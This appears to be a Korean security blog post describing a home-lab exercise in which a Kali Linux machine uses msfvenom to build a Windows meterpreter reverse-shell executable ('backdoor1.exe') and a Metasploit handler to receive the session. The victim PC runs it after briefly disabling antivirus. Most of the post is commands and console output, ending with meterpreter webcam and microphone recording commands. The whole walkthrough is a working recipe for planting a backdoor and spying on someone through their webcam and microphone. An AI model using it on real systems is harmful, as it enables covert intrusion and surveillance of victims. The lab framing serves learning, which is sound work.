- 사용 시스템
KaliLInux
Windows 10 ( HOST PC )
- 명령어
webcam_list 설치돼 있는 웹캠의 정보를 가져온다.
webcam_start 목록에서 도출된 웹캠을 선택해서 시작한다.
webcam_get_frame 사진의 프레임 값을 정한다. 화질을 지정할 때 사용한다.
webcam_stop 웹캠의 실행을 중지한다.
webcat_audio_record 웹캠 마이크를 사용해 녹음을 지원한다.
- 실습
(kali)
- host PC와는 192.168.17.50과 연결됩니다.
kali에는 포트포워딩 설정이 안되있으므로 외부네트워크와 연결되는 IP를 사용합니다.
# cd /root/bin
# vi reverse_resource3.rc
|
use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.17.50 set ExitSession false exploit -j -z |
|
#msfvenom -p windows/x64/meterpreter/reverse_tcp \
> LHOST=192.168.17.50 LPORT=4444 -f exe -o backdoor1.exe
|
No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: backdoor1.exe |
|
# cp backdoor1.exe /share
# msfconsole -r reverse_resource3.rc
|
[*] Processing reverse_resource3.rc for ERB directives. resource (reverse_resource3.rc)> use exploit/multi/handler resource (reverse_resource3.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp resource (reverse_resource3.rc)> set LHOST 192.168.17.50 LHOST => 192.168.17.50 resource (reverse_resource3.rc)> set ExitSession false ExitSession => false resource (reverse_resource3.rc)> exploit -j -z [*] Exploit running as background job. [*] Started reverse TCP handler on 192.168.17.50:4444 [*] Starting the payload handler... msf exploit(handler) > |
|
(win10)
<WINDOWS> + R > \\192.168.17.50
backdoor.exe 실행 ( virustotal 에서 확인했다시피 악성코드를 잡아내는 AV가 설치 되어있다면 잠깐 끄고 실행합니다. )
(kali)
|
[*] Sending stage (1189423 bytes) to 192.168.17.1 [*] Meterpreter session 1 opened (192.168.17.50:4444 -> 192.168.17.1:52755) at 2017-11-11 23:49:24 +0900 msf exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter x64/windows DESKTOP-F39FI66\admin @ DESKTOP-F39FI66 192.168.17.50:4444 -> 192.168.17.1:52755 (192.168.17.1) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > help Stdapi: Webcam Commands ======================= Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam meterpreter > webcam_list [-] No webcams were found |
|
> 웹캠이 있다면 목록이 나타납니다.
> 키보드 스니핑과 방법은 같습니다.
'Security > 정보 수집' 카테고리의 다른 글
setoolkit을 이용한 Java Applet Attack (0) | 2017.11.12 |
---|---|
SET ( Social Engineering Tech. ) (0) | 2017.11.12 |
패스워드 해시 덤프 ( password the hash dump ) (0) | 2017.11.11 |
키보드 스니핑과 스크린샷 (0) | 2017.11.11 |
변조된 PDF 파일 생성하기 (0) | 2017.11.11 |